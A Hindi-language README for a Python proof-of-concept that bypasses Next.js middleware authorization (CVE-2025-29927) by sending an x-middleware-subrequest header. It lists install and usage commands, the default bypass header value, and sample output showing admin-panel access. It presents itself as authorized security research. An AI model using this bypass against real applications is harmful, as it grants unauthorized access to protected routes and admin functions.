
> 🔓 एक काल्पनिक Next.js मिडलवेयर बाईपास (CVE-2025-29927) के लिए प्रूफ-ऑफ-कॉन्सेप्ट — संरक्षित रूट्स का परीक्षण करने के लिए सब-रिक्वेस्ट तैयार करें।
यह एक proof-of-concept है जो काल्पनिक Next.js मिडलवेयर बायपास भेद्यता (CVE-2025-29927) के लिए है। इसे केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए उपयोग करें।
| विशेषता | विवरण |
|---|---|
| ✨ रंग और वर्बोज़ | रंग-कोडित आउटपुट; विस्तृत डिबग लॉग के लिए -v। |
| 📦 OOP संरचना | स्पष्टता और रखरखाव के लिए क्लास-आधारित डिज़ाइन। |
| 🌐 प्रॉक्सी समर्थन | --proxy के माध्यम से HTTP(S) प्रॉक्सी के जरिए ट्रैफ़िक रूट करें। |
| 🍪 सत्र प्रबंधन | कुकीज़ और कनेक्शन पुन: उपयोग के लिए लगातार requests.Session। |
| 🚦 रीडायरेक्ट नियंत्रण | डिफ़ॉल्ट रूप से नो-फॉलो-रीडायरेक्ट; पास बनाम असफल को स्पष्ट रूप से पहचानता है। |
| 🛠 कस्टम हेडर | User-Agent, x-middleware-subrequest को ओवरराइड करें, या हेडर जोड़ें। |
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc
# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate
# Install dependencies
pip install -r requirements.txt
आवश्यक Python 3.7+
python poc.py [options] <host>[:port]
python poc.py localhost:3000
python poc.py example.com -s https -p /dashboard
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v
सफलता
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…
विफलता
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)
| विकल्प | विवरण |
|---|
-p, --path PATH | संरक्षित रूट पथ (डिफ़ॉल्ट: /admin) |
-s, --scheme {http,https} | प्रोटोकॉल (डिफ़ॉल्ट: http) |
--header HEADER | x-middleware-subrequest हेडर मान (डिफ़ॉल्ट: middleware:middleware) |
-ua, --user-agent AGENT | कस्टम User-Agent (डिफ़ॉल्ट: Mozilla/5.0) |
--proxy PROXY | HTTP(S) प्रॉक्सी URL (उदा., http://127.0.0.1:8080) |
-v, --verbose | डिबग आउटपुट सक्षम करें |
-h, --help | यह सहायता संदेश दिखाएँ |